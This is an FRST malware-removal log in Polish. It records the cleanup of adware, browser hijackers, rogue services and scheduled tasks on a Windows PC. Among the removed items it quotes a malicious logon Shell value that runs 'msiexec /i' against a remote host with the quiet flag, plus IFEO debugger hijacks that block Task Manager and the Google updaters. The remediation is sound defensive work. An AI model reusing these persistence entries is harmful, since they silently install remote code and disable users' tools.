Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 31-05-2017 Uruchomiony przez BD (01-06-2017 21:37:52) Run:1 Uruchomiony z C:\Users\BD\Downloads\fixitpc Załadowane profile: BD (Dostępne profile: BD) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: Task: {0BBC3407-63A7-4024-8D87-2C8F66C78D92} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA Task: {CDFEB964-06FE-47B9-A5BE-A0CC5F3B3636} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA C:\Users\BD\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Hotleaf RemoveDirectory: C:\Users\BD\AppData\Local\Hotleaf RemoveDirectory: C:\Users\BD\AppData\Roaming\Hotleaf FirewallRules: [{153D5063-7879-460C-A56D-AB1A5629D961}] => (Allow) C:\Program Files (x86)\Hotleaf\Application\chrome.exe FirewallRules: [{1CCACA35-7A3C-4772-84A9-638AB306BF36}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{9D45CE1D-2C50-41A7-915F-78DD6CF0ACC3}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\BD\AppData\Local\Firefox RemoveDirectory: C:\Users\BD\AppData\Roaming\Firefox HKU\S-1-5-21-247650637-2128827155-1350483122-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj82RYZLNjzQOWIcNWqdRTVSF8VSFkM5FkIcMWk5FdI3MF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = Edge HomeButtonPage: HKU\S-1-5-21-247650637-2128827155-1350483122-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493719012&z=cb9aa0b8f138258742938bdg4zftfcdmdg6t9eageg&from=ypid&uid=ST1000LM014-SSHD-8GB_W772XDYDXXXXW772XDYD R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S3 dbx; system32\DRIVERS\dbx.sys [X] 2017-05-24 14:29 - 2017-05-24 14:29 - 00000042 _____ C:\WINDOWS\SysWOW64\GZ 2017-05-24 14:29 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-24 14:29 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-18 14:38 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\00 2017-05-10 12:25 - 2017-05-10 12:25 - 00000000 _____ C:\WINDOWS\SysWOW64\1 2017-05-09 13:54 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-25 09:25 - 2017-04-25 22:05 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-05-05 14:59 - 2017-05-05 14:59 - 00000000 ____D C:\WINDOWS\psgo RemoveDirectory: C:\Program Files (x86)\MIO C:\Users\BD\Desktop\Outlook 2016.lnk C:\Users\BD\AppData\Roaming\Microsoft\Word\Nowy%20Dokument%20programu%20Microsoft%20Word305945570761120801\Nowy%20Dokument%20programu%20Microsoft%20Word.docx.lnk C:\Users\BD\AppData\Roaming\Microsoft\Windows\SendTo\Android (ALLPlayer Pilot).lnk C:\Users\BD\AppData\Roaming\Microsoft\Excel\TB-07_401A-412A305951521776555499\TB-07_401A-412A.DBF.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\BD\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\BD\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google Hosts: EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0BBC3407-63A7-4024-8D87-2C8F66C78D92} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0BBC3407-63A7-4024-8D87-2C8F66C78D92} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDFEB964-06FE-47B9-A5BE-A0CC5F3B3636} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDFEB964-06FE-47B9-A5BE-A0CC5F3B3636} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => klucz pomyślnie usunięto C:\Users\BD\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono "C:\Program Files (x86)\Hotleaf" => pomyślnie usunięto. "C:\Users\BD\AppData\Local\Hotleaf" => pomyślnie usunięto. "C:\Users\BD\AppData\Roaming\Hotleaf" => pomyślnie usunięto. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{153D5063-7879-460C-A56D-AB1A5629D961} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1CCACA35-7A3C-4772-84A9-638AB306BF36} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9D45CE1D-2C50-41A7-915F-78DD6CF0ACC3} => Wartość pomyślnie usunięto "C:\Program Files (x86)\Firefox" => pomyślnie usunięto. "C:\Users\BD\AppData\Local\Firefox" => pomyślnie usunięto. "C:\Users\BD\AppData\Roaming\Firefox" => pomyślnie usunięto. HKU\S-1-5-21-247650637-2128827155-1350483122-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avg => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-247650637-2128827155-1350483122-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage => Wartość pomyślnie usunięto HKLM\System\CurrentControlSet\Services\ibtsiva => klucz pomyślnie usunięto ibtsiva => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\dbx => klucz pomyślnie usunięto dbx => serwis pomyślnie usunięto C:\WINDOWS\SysWOW64\GZ => pomyślnie przeniesiono C:\WINDOWS\SysWOW64\3333333 => pomyślnie przeniesiono C:\WINDOWS\SysWOW64\1111111 => pomyślnie przeniesiono C:\WINDOWS\SysWOW64\00 => pomyślnie przeniesiono C:\WINDOWS\SysWOW64\1 => pomyślnie przeniesiono C:\WINDOWS\SysWOW64\1111 => pomyślnie przeniesiono C:\Program Files (x86)\BiaoJi => pomyślnie przeniesiono C:\WINDOWS\psgo => pomyślnie przeniesiono "C:\Program Files (x86)\MIO" => pomyślnie usunięto. C:\Users\BD\Desktop\Outlook 2016.lnk => pomyślnie przeniesiono "C:\Users\BD\AppData\Roaming\Microsoft\Word\Nowy%20Dokument%20programu%20Microsoft%20Word305945570761120801\Nowy%20Dokument%20programu%20Microsoft%20Word.docx.lnk" => nie znaleziono. C:\Users\BD\AppData\Roaming\Microsoft\Windows\SendTo\Android (ALLPlayer Pilot).lnk => pomyślnie przeniesiono C:\Users\BD\AppData\Roaming\Microsoft\Excel\TB-07_401A-412A305951521776555499\TB-07_401A-412A.DBF.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\BD\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono "C:\Program Files (x86)\Google" => nie znaleziono. "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" => nie znaleziono. C:\Users\BD\AppData\Local\Google => pomyślnie przeniesiono HKCU\Software\Google => klucz pomyślnie usunięto HKLM\SOFTWARE\Google => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Google => klucz pomyślnie usunięto C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. =========== EmptyTemp: ========== BITS transfer queue => 583648 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 20678758 B Java, Flash, Steam htmlcache => 506 B Windows/system/drivers => 69557000 B Edge => 1648453 B Chrome => 0 B Firefox => 250095313 B Opera => 1243136 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 1045 B systemprofile32 => 12 B LocalService => 83984 B NetworkService => 50194 B BD => 203677830 B RecycleBin => 0 B EmptyTemp: => 522.3 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 21:43:09 ====